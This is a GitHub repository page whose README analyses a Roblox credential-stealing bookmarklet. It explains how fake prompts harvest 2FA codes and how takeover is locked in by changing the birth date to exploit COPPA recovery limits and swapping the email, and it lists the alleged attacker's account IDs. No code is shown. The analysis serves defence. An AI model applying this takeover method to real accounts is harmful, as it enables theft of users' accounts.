Skip to content
This repository was archived by the owner on Aug 11, 2024. It is now read-only.
/ rolinked-malware-analysis Public archive

A detailed analysis of a sophisticated Roblox credential-stealing malware, focusing on its methods, features, and mitigation strategies.

1 star 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

JustOptimize/rolinked-malware-analysis

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
src
src
 
 
README.md
README.md
 
 

Repository files navigation

Important

The code in this repository is malicious and should not be used under any circumstances. This analysis is provided solely for educational purposes.

RoLinked/Vlk Games/Vik Games – Roblox Credential-Stealing Malware

Overview

A sophisticated piece of malware has been identified, targeting Roblox users and compromising their accounts through deceptive methods. This malware is delivered via a bookmarklet on the attacker's websites (rolinked[.]com, rolinked[.]co) and is specifically designed to steal users' credentials, including their two-factor authentication (2FA) codes. The code is highly obfuscated, making it difficult to detect or reverse-engineer, which allows it to operate stealthily.

How It Works

  • Initial Contact: The attack begins when users are tricked into visiting the attacker's website, where they are instructed to drag a bookmarklet to their bookmarks bar. When executed on the Roblox website, this bookmarklet injects the malicious code.

  • Malicious Injection: Once injected, the malware manipulates the Roblox interface, displaying fake prompts that convince users to provide sensitive information, including their 2FA codes.

  • Security Bypass and Account Takeover: The malware collects the 2FA code and other security details, such as parental control PINs. It then takes control of the user's account by:

    • Changing the date of birth to 2/2/2022, exploiting COPPA regulations to hinder account recovery.
    • Altering the registered email to the attacker’s email, thereby disabling password recovery options.
    • Previously, the malware also checked for Robux and purchased scam products, though this feature is currently inactive.

Attacker Information

Associated Emails:

Roblox Alt Account:

  • Username: @slimeBallBack7
  • ID: 6045232974
  • Creation Date: 5/19/2024

Discord Account:

  • Username: infiniteblox
  • ID: 934401513734950912

Protection Measures

To safeguard against this malware and similar threats:

  • Stay Vigilant: Be cautious when interacting with off-platform websites, especially those that ask you to execute code.
  • Avoid Suspicious Links: Do not click on links from untrusted or unknown sources.
  • Do Not Execute Unverified Code: Never run code from untrusted sources, whether it’s a bookmarklet or a script in the developer console.

By adhering to these safety practices, you can protect yourself from potential threats targeting your Roblox account and other online platforms.

About

A detailed analysis of a sophisticated Roblox credential-stealing malware, focusing on its methods, features, and mitigation strategies.

Topics

roblox cybersecurity malware-analysis

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

1 fork
Report repository

Languages